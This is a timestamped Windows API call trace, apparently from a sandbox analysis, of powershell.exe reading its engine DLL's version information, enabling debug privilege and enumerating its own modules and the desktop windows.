	[0319.807] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x2c57500, puLen=0x10d9a0) returned 1
	[0319.807] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0319.807] CoTaskMemAlloc (cb=0x20) returned 0x3abc60
	[0319.807] lstrcpyW (in: lpString1=0x3abc60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0319.807] CoTaskMemFree (pv=0x3abc60) 
	[0319.807] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x2c57540, puLen=0x10d9a0) returned 1
	[0319.807] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0319.807] CoTaskMemAlloc (cb=0x44) returned 0x324c40
	[0319.807] lstrcpyW (in: lpString1=0x324c40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0319.808] CoTaskMemFree (pv=0x324c40) 
	[0319.808] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x2c575a8, puLen=0x10d9a0) returned 1
	[0319.808] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0319.808] CoTaskMemAlloc (cb=0x76) returned 0x3511f0
	[0319.808] lstrcpyW (in: lpString1=0x3511f0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0319.808] CoTaskMemFree (pv=0x3511f0) 
	[0319.808] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x2c57644, puLen=0x10d9a0) returned 1
	[0319.808] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0319.808] CoTaskMemAlloc (cb=0x44) returned 0x324c40
	[0319.808] lstrcpyW (in: lpString1=0x324c40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0319.808] CoTaskMemFree (pv=0x324c40) 
	[0319.808] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x2c576a8, puLen=0x10d9a0) returned 1
	[0319.808] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0319.808] CoTaskMemAlloc (cb=0x58) returned 0x372410
	[0319.808] lstrcpyW (in: lpString1=0x372410, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0319.808] CoTaskMemFree (pv=0x372410) 
	[0319.808] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x2c57724, puLen=0x10d9a0) returned 1
	[0319.808] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0319.808] CoTaskMemAlloc (cb=0x20) returned 0x3abc60
	[0319.808] lstrcpyW (in: lpString1=0x3abc60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0319.808] CoTaskMemFree (pv=0x3abc60) 
	[0319.808] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x2c573cc, puLen=0x10d9a0) returned 1
	[0319.808] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0319.808] CoTaskMemAlloc (cb=0x66) returned 0x3a3290
	[0319.808] lstrcpyW (in: lpString1=0x3a3290, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0319.808] CoTaskMemFree (pv=0x3a3290) 
	[0319.808] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x0, puLen=0x10d9a0) returned 0
	[0319.808] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x0, puLen=0x10d9a0) returned 0
	[0319.808] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x0, puLen=0x10d9a0) returned 0
	[0319.808] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10d978, puLen=0x10d970 | out: lplpBuffer=0x10d978*=0x2c57374, puLen=0x10d970) returned 1
	[0319.810] CoTaskMemAlloc (cb=0x204) returned 0x3578c0
	[0319.810] VerLanguageNameW (in: wLang=0x0, szLang=0x3578c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0319.811] CoTaskMemFree (pv=0x3578c0) 
	[0319.811] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\", lplpBuffer=0x10d9c8, puLen=0x10d9c0 | out: lplpBuffer=0x10d9c8*=0x2c57300, puLen=0x10d9c0) returned 1
	[0319.817] GetCurrentProcessId () returned 0x618
	[0319.845] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x10c8f0 | out: lpLuid=0x10c8f0*(LowPart=0x14, HighPart=0)) returned 1
	[0319.848] GetCurrentProcess () returned 0xffffffffffffffff
	[0319.848] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x10c910 | out: TokenHandle=0x10c910*=0x2e4) returned 1
	[0319.849] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2c5ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0319.850] CloseHandle (hObject=0x2e4) returned 1
	[0319.853] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x618) returned 0x2e4
	[0319.861] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2c5abb8, cb=0x200, lpcbNeeded=0x10d928 | out: lphModule=0x2c5abb8, lpcbNeeded=0x10d928) returned 1
	[0319.864] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2c5ae28, cb=0x18 | out: lpmodinfo=0x2c5ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0319.865] CoTaskMemAlloc (cb=0x804) returned 0x3adcc0
	[0319.865] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x3adcc0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0319.865] CoTaskMemFree (pv=0x3adcc0) 
	[0319.866] CoTaskMemAlloc (cb=0x804) returned 0x3adcc0
	[0319.866] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x3adcc0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0319.867] CoTaskMemFree (pv=0x3adcc0) 
	[0320.315] CloseHandle (hObject=0x2e4) returned 1
	[0320.331] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x618) returned 0x2e4
	[0320.332] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x10da58 | out: lpExitCode=0x10da58*=0x103) returned 1
	[0320.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c5b088, Length=0x20000, ResultLength=0x10da20 | out: SystemInformation=0x12c5b088, ResultLength=0x10da20*=0x17c10) returned 0x0
	[0320.357] EnumWindows (lpEnumFunc=0x2bd66ac, lParam=0x0) returned 1
	[0321.115] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.115] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x558
	[0321.115] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.115] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.115] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.115] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x538
	[0321.116] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.116] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x778
	[0321.116] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x778
	[0321.116] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.116] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.116] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.116] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.116] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.117] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.117] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.117] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.117] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x460
	[0321.117] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.117] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.117] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xd94
	[0321.117] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xd74
	[0321.117] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xd00
	[0321.118] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xcd8
	[0321.118] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xc84
	[0321.118] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xca4
	[0321.118] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xc64
	[0321.118] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xc24
	[0321.118] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb84
	[0321.118] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xbac
	[0321.118] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x384
	[0321.119] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xab8
	[0321.119] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x33c
	[0321.119] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa44
	[0321.119] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa64
	[0321.119] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x8a8
	[0321.119] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xaf0
	[0321.119] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x88c
	[0321.119] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb04
	[0321.119] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x910
	[0321.119] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x230
	[0321.120] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xac0
	[0321.120] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xab4
	[0321.120] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xaac
	[0321.120] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x3d0
	[0321.120] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x978
	[0321.120] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa7c
	[0321.120] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x59c
	[0321.121] GetWindow (hWnd=0x10224, uCmd=0x4) returned 0x0
	[0321.122] IsWindowVisible (hWnd=0x10224) returned 0
	[0321.122] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa88
	[0321.122] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa6c
	[0321.122] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa68
	[0321.122] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x9f8
	[0321.122] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa04
	[0321.122] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x924
	[0321.122] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x8dc
	[0321.123] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x7dc
	[0321.123] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x768
	[0321.123] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x764
	[0321.123] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x820
	[0321.123] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x810
	[0321.123] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x794
	[0321.123] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x83c
	[0321.123] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x7ac
	[0321.123] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb44
	[0321.123] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb5c
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x838
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x818
	[0321.124] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x5b8
	[0321.125] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x494
	[0321.125] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x1ec
	[0321.125] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x440
	[0321.125] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x7e8
	[0321.125] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x730
	[0321.125] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x2c8
	[0321.125] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x31c
	[0321.125] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x330
	[0321.125] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x128
	[0321.125] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x5c8
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x6f8
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x358
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x73c
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb0
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x250
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x240
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x790
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x61c
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x540
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x538
	[0321.126] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x568
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x538
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x568
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x538
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x540
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x540
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x57c
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x460
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x554
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x528
	[0321.127] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x79c
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4e0
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x460
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x460
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x44c
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x778
	[0321.128] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x460
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x558
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4d0
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xde0
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xddc
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xdd8
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xd34
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xd10
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xd0c
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xc9c
	[0321.129] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xc74
	[0321.130] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xc1c
	[0321.130] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xc08
	[0321.130] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xabc
	[0321.130] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x24c
	[0321.130] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xbb0
	[0321.130] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xbfc
	[0321.130] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb10
	[0321.130] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x374
	[0321.130] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x368
	[0321.130] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb28
